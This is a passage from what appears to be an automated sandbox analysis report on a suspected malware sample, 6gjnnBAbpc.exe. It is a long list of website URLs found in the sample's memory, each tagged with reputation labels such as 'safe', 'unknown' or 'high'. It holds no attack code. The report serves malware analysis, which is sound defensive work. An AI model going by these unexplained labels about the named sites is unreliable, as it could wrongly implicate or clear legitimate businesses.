00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.pcgrate.com6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://lolipop.jp/6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://www.naoi-a.com/6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313030097.000000000A4D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.ka-mo-me.com/S6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.nelipak.nl/.K6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.pcgrate.com6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.mobilnic.net/upload/img/201905280859514872.png6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.com-sit.com/wp-content/themes/betheme/js/plugins/countdown.min.js?ver=26.66gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.com-sit.com/wp-content/uploads/2018/11/logo-COM-SIT.png6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1170x658.png6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://schema.org/WebPage6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=16649598786gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.406gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://www.yumgiskor.kz/6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://www.myropcb.com/wp-json/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D97000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 